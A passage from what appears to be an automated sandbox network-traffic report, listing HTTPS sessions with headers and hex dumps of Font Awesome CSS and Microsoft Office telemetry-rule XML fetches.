                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: text/css,*/*;q=0.1
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: style
                                                                          Referer: https://proficocap.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:15 UTC950INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:15 GMT
                                                                          Content-Type: text/css; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Access-Control-Allow-Origin: *
                                                                          Cache-Control: public, max-age=30672000
                                                                          ETag: W/"619c057b-44be"
                                                                          Last-Modified: Mon, 22 Nov 2021 21:02:51 GMT
                                                                          cf-cdnjs-via: cfworker/kv
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Timing-Allow-Origin: *
                                                                          X-Content-Type-Options: nosniff
                                                                          CF-Cache-Status: HIT
                                                                          Age: 468318
                                                                          Expires: Fri, 28 Nov 2025 19:51:15 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2QVXPr%2FqR5RXP8VAQUov%2Fe5q71OgMdXXymIWqlJDZY0svcQoztNrlByzoVUBye4qKo5Br3bfvdz%2FBN4Lognl34TCrbk4MVDUbQaYRz5JyxQlmp%2Ba8%2B6Wkpt0%2BUP50r6KAiHRxvaA"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                          Strict-Transport-Security: max-age=15780000
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef49ff5a737c6a-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:51:15 UTC419INData Raw: 37 62 66 61 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 30 2e 30 2d 62 65 74 61 33 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 31 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61
                                                                          Data Ascii: 7bfa/*! * Font Awesome Free 6.0.0-beta3 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2021 Fonticons, Inc. */.fa{font-family:var(--fa
                                                                          2024-12-08 19:51:15 UTC1369INData Raw: 61 74 7b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f
                                                                          Data Ascii: at{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{fo
                                                                          2024-12-08 19:51:15 UTC1369INData Raw: 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e
                                                                          Data Ascii: t:var(--fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0);animation-delay:var(--fa-animation-delay,0);-webkit-animation-direction:var(--fa-animation-direction,normal);an
                                                                          2024-12-08 19:51:15 UTC1369INData Raw: 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 7d 2e 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66
                                                                          Data Ascii: -duration,1s);animation-duration:var(--fa-animation-duration,1s)}.fa-beat-fade{-webkit-animation-name:fa-beat-fade;animation-name:fa-beat-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--f
                                                                          2024-12-08 19:51:15 UTC1369INData Raw: 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d
                                                                          Data Ascii: irection:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,2s);animation-duration:var(--fa-animation-duration,2s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-
                                                                          2024-12-08 19:51:15 UTC1369INData Raw: 61 6e 73 69 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 73 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65
                                                                          Data Ascii: ansition-delay:0s;transition-delay:0s;-webkit-transition-duration:0s;transition-duration:0s}}@-webkit-keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-be
                                                                          2024-12-08 19:51:15 UTC1369INData Raw: 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 79 2c 31 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 7a 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 61 6e 67 6c 65 2c 2d 31 38 30 64 65 67 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 33 64 28 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 78 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 79 2c 31 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 7a 2c 30 29 2c 76 61 72 28 2d 2d 66 61 2d 66 6c 69 70 2d 61 6e 67 6c 65 2c 2d 31 38 30 64 65 67 29 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65
                                                                          Data Ascii: ar(--fa-flip-y,1),var(--fa-flip-z,0),var(--fa-flip-angle,-180deg));transform:rotate3d(var(--fa-flip-x,0),var(--fa-flip-y,1),var(--fa-flip-z,0),var(--fa-flip-angle,-180deg))}}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0de
                                                                          2024-12-08 19:51:15 UTC1369INData Raw: 3a 22 5c 33 30 22 7d 2e 66 61 2d 31 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 31 22 7d 2e 66 61 2d 32 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 32 22 7d 2e 66 61 2d 33 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 33 22 7d 2e 66 61 2d 34 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 34 22 7d 2e 66 61 2d 35 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 35 22 7d 2e 66 61 2d 36 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 36 22 7d 2e 66 61 2d 37 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 37 22 7d 2e 66 61 2d 38 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 38 22 7d 2e 66 61 2d 39 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 33 39 22 7d 2e 66 61 2d 61
                                                                          Data Ascii: :"\30"}.fa-1:before{content:"\31"}.fa-2:before{content:"\32"}.fa-3:before{content:"\33"}.fa-4:before{content:"\34"}.fa-5:before{content:"\35"}.fa-6:before{content:"\36"}.fa-7:before{content:"\37"}.fa-8:before{content:"\38"}.fa-9:before{content:"\39"}.fa-a
                                                                          2024-12-08 19:51:15 UTC1369INData Raw: 63 2d 64 6f 77 6e 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 38 36 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 61 2d 7a 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 6f 72 74 2d 61 6c 70 68 61 2d 61 73 63 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 6f 72 74 2d 61 6c 70 68 61 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 35 64 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 6c 6f 6e 67 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6c 6f 6e 67 2d 61 72 72 6f 77 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 35 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 73 68 6f 72 74 2d 77 69 64 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 6f 72 74 2d 61 6d 6f 75 6e 74 2d 64 65 73 63 3a 62 65
                                                                          Data Ascii: c-down-alt:before{content:"\f886"}.fa-arrow-down-a-z:before,.fa-sort-alpha-asc:before,.fa-sort-alpha-down:before{content:"\f15d"}.fa-arrow-down-long:before,.fa-long-arrow-down:before{content:"\f175"}.fa-arrow-down-short-wide:before,.fa-sort-amount-desc:be
                                                                          2024-12-08 19:51:15 UTC1369INData Raw: 7d 2e 66 61 2d 61 72 72 6f 77 2d 74 75 72 6e 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6c 65 76 65 6c 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 34 39 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 74 75 72 6e 2d 75 70 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6c 65 76 65 6c 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 34 38 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 36 32 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 75 70 2d 31 2d 39 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 73 6f 72 74 2d 6e 75 6d 65 72 69 63 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 36 33 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 75 70 2d 39 2d 31 3a 62 65 66 6f 72 65 2c 2e
                                                                          Data Ascii: }.fa-arrow-turn-down:before,.fa-level-down:before{content:"\f149"}.fa-arrow-turn-up:before,.fa-level-up:before{content:"\f148"}.fa-arrow-up:before{content:"\f062"}.fa-arrow-up-1-9:before,.fa-sort-numeric-up:before{content:"\f163"}.fa-arrow-up-9-1:before,.


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          44192.168.2.44980513.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:14 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:15 UTC494INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:15 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 2160
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                          ETag: "0x8DC582BA3B95D81"
                                                                          x-ms-request-id: a36b2733-e01e-0051-6f03-4884b2000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195115Z-r1cf579d778dfdgnhC1EWRd3w0000000061g000000006pu0
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:15 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          45192.168.2.44980413.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:14 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:15 UTC494INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:15 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 2980
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                          ETag: "0x8DC582BA80D96A1"
                                                                          x-ms-request-id: 2b116ba0-201e-0051-0503-487340000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195115Z-r1cf579d778w59f9hC1EWRze6w00000006gg0000000060a3
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:15 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          46192.168.2.44980313.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:14 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:15 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:15 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 450
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                          ETag: "0x8DC582BD4C869AE"
                                                                          x-ms-request-id: c11b12be-901e-0048-4704-48b800000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195115Z-r1cf579d778zvkpnhC1EWRv23g00000006f0000000008b9b
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:15 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          47192.168.2.44980213.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:14 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:15 UTC494INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:15 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 3788
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                          ETag: "0x8DC582BAC2126A6"
                                                                          x-ms-request-id: 3fcd35f4-e01e-0052-4b02-48d9df000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195115Z-r1cf579d778dfdgnhC1EWRd3w00000000630000000004bmm
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:15 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          48192.168.2.44980613.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:14 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:15 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:15 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 408
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                          ETag: "0x8DC582BB56D3AFB"
                                                                          x-ms-request-id: b9950e54-401e-0015-4806-480e8d000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195115Z-r1cf579d778xr2r4hC1EWRqvfs000000069g0000000066qr
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
